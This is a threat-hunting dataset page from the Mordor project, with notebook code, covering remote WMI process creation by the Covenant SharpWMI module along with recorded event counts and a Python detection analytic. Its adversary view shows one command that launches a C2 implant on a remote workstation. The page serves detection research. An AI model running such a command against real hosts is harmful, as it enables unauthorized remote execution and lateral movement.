Covenant SharpWMI Exec

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2019/05/18

Modification Date

2020/09/20

Tactics

['TA0002', 'TA0008']

Techniques

['T1047']

Tags

['WMI IWbemServices ExecMethod']

Dataset Description

This dataset represents an adversary remotely executing code via WMI. It focuses on the use of the WMI Win32_Process class and its Create method (invoked on the remote host through IWbemServices::ExecMethod) to start a process on the target.

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author | Name | Link

Simulation Plan

Environment | Tool Type | Module
Mordor shire | C2 | SharpWMI

Adversary View

(wardog) > SharpWMI /command:"action=exec computername=WORKSTATION6 command=\"C:\\Windows\\System32\\GruntHTTP2.exe\""
[*] Host                           : WORKSTATION6
[*] Command                        : "C:\\Windows\\System32\\GruntHTTP2.exe"
[*] Creation of process returned   : 0
[*] Process ID                     : 3824

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *   # helpers for loading Mordor datasets into Spark
spark = get_spark()                  # SparkSession used by the SQL queries below

Download & Process Mordor File

# dataset archive hosted in the OTRF mordor repository; downloaded, parsed and exposed as a SparkSQL view
mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/lateral_movement/host/covenant_sharpwmi_create_dcerpc_wmi.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+------------------------------------+-------+-----+
|Hostname                   |Channel                             |EventID|count|
+---------------------------+------------------------------------+-------+-----+
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational|10     |492  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational|12     |391  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational|13     |230  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational|7      |150  |
|WORKSTATION6.theshire.local|Security                            |4656   |114  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|10     |76   |
|MORDORDC.theshire.local    |Microsoft-Windows-Sysmon/Operational|7      |74   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|12     |66   |
|WORKSTATION6.theshire.local|Security                            |4658   |51   |
|MORDORDC.theshire.local    |Microsoft-Windows-Sysmon/Operational|12     |45   |
|WORKSTATION6.theshire.local|Security                            |5156   |41   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|13     |41   |
|MORDORDC.theshire.local    |Security                            |5158   |39   |
|WORKSTATION6.theshire.local|Security                            |5158   |37   |
|MORDORDC.theshire.local    |Security                            |5156   |37   |
|WORKSTATION5.theshire.local|Security                            |5156   |34   |
|MORDORDC.theshire.local    |Microsoft-Windows-Sysmon/Operational|3      |33   |
|MORDORDC.theshire.local    |Microsoft-Windows-Sysmon/Operational|13     |33   |
|MORDORDC.theshire.local    |Security                            |4658   |32   |
|WORKSTATION5.theshire.local|Security                            |5158   |28   |
+---------------------------+------------------------------------+-------+-----+
only showing top 20 rows
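As an added example (not part of the original notebook), the analytic a hunter would run over this dataset, written in plain Python instead of Spark SQL: processes whose parent is the WMI provider host WmiPrvSE.exe (the parent of anything started through Win32_Process.Create), tied to a network logon (Security 4624, LogonType 3) that opened the same logon session on that host shortly before, so that local WMI activity under SYSTEM is not flagged. The records are constructed; the hostname, image and PID follow the adversary view above, while the logon ids, user and source IP are invented.

```python
# Added example (not from the original notebook): pure-Python stand-in for a
# Spark SQL analytic over this dataset. Field names follow the Sysmon (EID 1)
# and Security (EID 4624) schemas; every record below is constructed.
from datetime import datetime, timedelta

EVENTS = [  # constructed sample events
    {"Hostname": "WORKSTATION6.theshire.local", "Channel": "Security", "EventID": 4624,
     "@timestamp": "2020-09-20T20:14:01Z", "LogonType": 3, "TargetLogonId": "0x5e2a1",
     "TargetUserName": "user1", "IpAddress": "172.18.39.5"},
    {"Hostname": "WORKSTATION6.theshire.local", "Channel": "Microsoft-Windows-Sysmon/Operational",
     "EventID": 1, "@timestamp": "2020-09-20T20:14:03Z", "ProcessId": 3824, "LogonId": "0x5e2a1",
     "Image": "C:\\Windows\\System32\\GruntHTTP2.exe",
     "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"},
    # benign: WMI provider spawning a child under the local SYSTEM session (no network logon)
    {"Hostname": "WORKSTATION6.theshire.local", "Channel": "Microsoft-Windows-Sysmon/Operational",
     "EventID": 1, "@timestamp": "2020-09-20T20:15:00Z", "ProcessId": 4410, "LogonId": "0x3e7",
     "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"},
    # benign: ordinary service child, parent is not WmiPrvSE.exe
    {"Hostname": "WORKSTATION5.theshire.local", "Channel": "Microsoft-Windows-Sysmon/Operational",
     "EventID": 1, "@timestamp": "2020-09-20T20:16:00Z", "ProcessId": 812, "LogonId": "0x3e7",
     "Image": "C:\\Windows\\System32\\svchost.exe",
     "ParentImage": "C:\\Windows\\System32\\services.exe"},
]

def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")

def wmi_remote_exec(events, window=timedelta(minutes=5)):
    """(host, image, pid, source_ip) for each process spawned by WmiPrvSE.exe whose logon
    session was opened by a network logon (4624, LogonType 3) on that host within `window`."""
    net_logons = [e for e in events
                  if e["Channel"] == "Security" and e["EventID"] == 4624 and e["LogonType"] == 3]
    hits = []
    for e in events:
        if e["EventID"] != 1 or not e["Channel"].endswith("Sysmon/Operational"):
            continue
        if not e["ParentImage"].lower().endswith("\\wbem\\wmiprvse.exe"):
            continue
        for lg in net_logons:  # join on host and logon session id, logon must precede the process
            delta = _ts(e["@timestamp"]) - _ts(lg["@timestamp"])
            if (lg["Hostname"] == e["Hostname"] and lg["TargetLogonId"] == e["LogonId"]
                    and timedelta(0) <= delta <= window):
                hits.append((e["Hostname"], e["Image"], e["ProcessId"], lg["IpAddress"]))
                break
    return hits

if __name__ == "__main__":
    for hit in wmi_remote_exec(EVENTS):
        print("remote WMI exec: host=%s image=%s pid=%s from=%s" % hit)
```

The same join expressed over mordorTable would match ParentImage LIKE '%WmiPrvSE.exe' in Sysmon EID 1 against Security 4624 rows on Hostname and LogonId = TargetLogonId.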